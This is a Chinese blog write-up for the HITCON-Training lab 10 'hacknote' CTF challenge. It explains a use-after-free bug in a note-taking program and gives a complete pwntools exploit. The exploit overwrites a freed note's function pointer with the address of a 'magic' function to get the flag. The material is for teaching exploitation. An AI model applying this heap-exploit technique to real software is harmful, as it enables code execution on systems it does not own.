HITCON-training lab 10 hacknote题解

最新推荐文章于 2021-08-19 11:52:36 发布
最新推荐文章于 2021-08-19 11:52:36 发布
阅读量687 收藏
点赞数
分类专栏: 堆溢出题目 文章标签: use after free
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38419913/article/details/103153230
版权

基本信息

首先,我们通过checksec来查看程序的基本信息和开启的防护。该程序是一个32位程序,并且开启了canary和nx。
运行程序之后发现是一个菜单类型的程序。
在这里插入图片描述

静态分析

add note函数

首先申请了一个8字节的chunk,其指针记录在bss段上。这个8字节的内容是一个结构体

struct node {
	指向print note content函数的指针
	指向content的指针
}

再输入大小能自己控制的content

delete note函数

首先free content,再free node strcut。可以注意到这里free之后指针没有清空,存在use after free漏洞。

print note函数

输入index,调用node struct中的print函数。

利用思路

  1. 申请一个note0,一个note1,注意两个note的content的大小不要和node struct大小落在同一个fastbin中。此时堆中的结构应该为:
    note0
    content0
    note1
    content1
    在这里插入图片描述

  2. 接下来free note1, free note2。申请的四个chunk均落入fastbins中。在这里插入图片描述

  3. 再次申请一个note,我们只要让申请时提供的size也正好能落在第一个fastbins中(比如8),那么我们新的node strcut就在0x980f028上,新的cotent就在0x980f000上,也就是本来第一个note的位置。从ida的导入表中发现magic函数,我们把这个函数地址写入第一个note的函数指针字段。

  4. 由于之前free的时候并没有把指针清空,所以我们现在调用print note函数再执行第一个note的时候,执行的是第一个note函数指针指向的函数,这个指针在第三步的时候已经被改写成为magic函数的地址。所以就可以cat flag

完整的exp

#coding=utf-8
from pwn import *

DEBUG = 1

io = process("./pwn")
if DEBUG:
    context.log_level = "DEBUG"
    context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

def add_note(size, content):
    io.recvuntil("choice :")
    io.sendline("1")
    io.recvuntil("size :")
    io.sendline(str(size))
    io.recvuntil("Content :")
    io.sendline(content)

def delete_note(index):
    io.recvuntil("choice :")
    io.sendline("2")
    io.recvuntil("Index :")
    io.sendline(str(index))

def print_note(index):
    io.recvuntil("choice :")
    io.sendline("3")
    io.recvuntil("Index :")
    io.sendline(str(index))

gdb.attach(io)

add_note(16, "A"*16) #note0
add_note(16, "B"*16) #note1

delete_note(0)
delete_note(1)

#fastbins note1->note0

magic_addr = 0x08048986
add_note(8, p32(magic_addr))

print_note(0)

io.interactive()
coco##
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
堆溢出----Use After Free
qq_42192672的博客
10-23 4733
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/ 不得不说有些被坑的感觉,Off-By-One也太难了,问了下大神,我觉得还是先把这个弄懂,那篇学习记录我就先咕咕咕了 以下截图来自CTFWIKI,感觉说的概念挺明确的 从这里我深刻体会到了栈和堆的不同,以及堆的困难,没有EIP给我直接...
uaf-lab 10 hacknote
m0_49959202的博客
08-06 175
文章目录uaf-lab 10 hacknote1.程序分析2.设计思路3.exp编写 uaf-lab 10 hacknote 1.程序分析 分析程序,发现程序是由几个部分组成:Add note、Delete note、 Print note,另外发现了magic函数 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ycbqU3Az-1628251301262)(https://i.loli.net/2021/07/23/R1mvnwpc4h7sF6f.png)] 下面对4个部分
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
hitcon-training lab10 - hacknote 做题笔记
fa1c4的blog
08-19 550
前言 hitcon-training lab10 堆利用例题 hacknote 过程 直接看源码 #include <stdio.h> #include <unistd.h> #include <stdlib.h> struct note { void (*printnote)(); char *content ; }; struct note *notelist[5]; int count = 0; void print_note_content(stru
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 841
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
暑假集训——Hitcon_Trainning——lab10_hacknote——堆UAF
qq_41667316的博客
07-13 269
堆漏洞-UAF 思路 本来就是打pwn苦手,搞堆真的更加难受[留下心酸泪水] 这道题做第二次了,寒假集训的时候也做了。但谁能想到,第二次做的时候仍旧是较为懵逼。 UAF 全称 use after free,是在free之后指针没有置NULL留下的漏洞。这就导致之前的指针还可以控制这块内存。 本题 这道题在ctfwiki上有详细解释。 这道题利用的是内存分配机制的fastbins。 fastbi...
HITCON-training lab10 wp
qq_43409582的博客
01-30 1643
0x00 开始堆利用的学习了,先做第一入门题目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 713
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道堆题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个堆块,分别是存放两个函数指针的8字节堆块和存放内容的堆块 这个示意图很清楚: ...
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON-ZeroDay年度报告.pdf
08-28
HITCON-ZeroDay年度报告 安全研究 安全研究 信息安全研究 安全开发 渗透测试
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节...
基于Java实现的明日知道系统.zip
05-31
基于Java实现的明日知道系统
NX二次开发uc1653 函数介绍
05-31
NX二次开发uc1653 函数介绍,Ufun提供了一系列丰富的 API 函数,可以帮助用户实现自动化、定制化和扩展 NX 软件的功能。无论您是从事机械设计、制造、模具设计、逆向工程、CAE 分析等领域的专业人士,还是希望提高工作效率的普通用户,NX 二次开发 Ufun 都可以帮助您实现更高效的工作流程。函数覆盖了 NX 软件的各个方面,包括但不限于建模、装配、制图、编程、仿真等。这些 API 函数可以帮助用户轻松地实现自动化、定制化和扩展 NX 软件的功能。例如,用户可以通过 Ufun 编写脚本,自动化完成重复性的设计任务,提高设计效率;或者开发定制化的功能,满足特定的业务需求。语法简单易懂,易于学习和使用。用户可以快速上手并开发出符合自己需求的 NX 功能。本资源内容 提供了丰富的中英文帮助文档,可以帮助用户快速了解和使用 Ufun 的功能。用户可以通过资源中的提示,学习如何使用 Ufun 的 API 函数,以及如何实现特定的功能。
别墅图纸编号D020-三层-10.00&12.00米- 效果图.dwg
最新发布
05-31
别墅图纸编号D020-三层-10.00&12.00米- 效果图.dwg
操作系统实验指导书(2024)单面打印(1).pdf
05-31
操作系统实验指导书(2024)单面打印(1).pdf
基于Python实现的校园教务系统
05-31
Api Function | Api | Description | Argument | | :-------- | :----- | :---- | | user_login | 登陆函数 | account, password, user_type=1, use_cookie_login=True | | get_schedule | 课表查询 | schedule_year=None, schedule_term=None, schedule_type=None | | get_score | 成绩查询 | score_year=None, score_term=None, use_api=0 | | get_info | 用户信息查询 | | | get_place_schedule| 教学场地课表查询(可用于空教室查询) |campus_list=None,
Qt+ContentMargin+QWidget设置内容边距
05-31
设置控件窗口边框与内容的边距,包含左、上、右、下四个边距。示例中点击界面按钮设置按钮控件、text browser控件两者与父节点的GridLayout之间的边距,通过点击按钮可看到边距变化导致的界面布局的变化。包含源码可直接在qtcreator中编译运行。
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值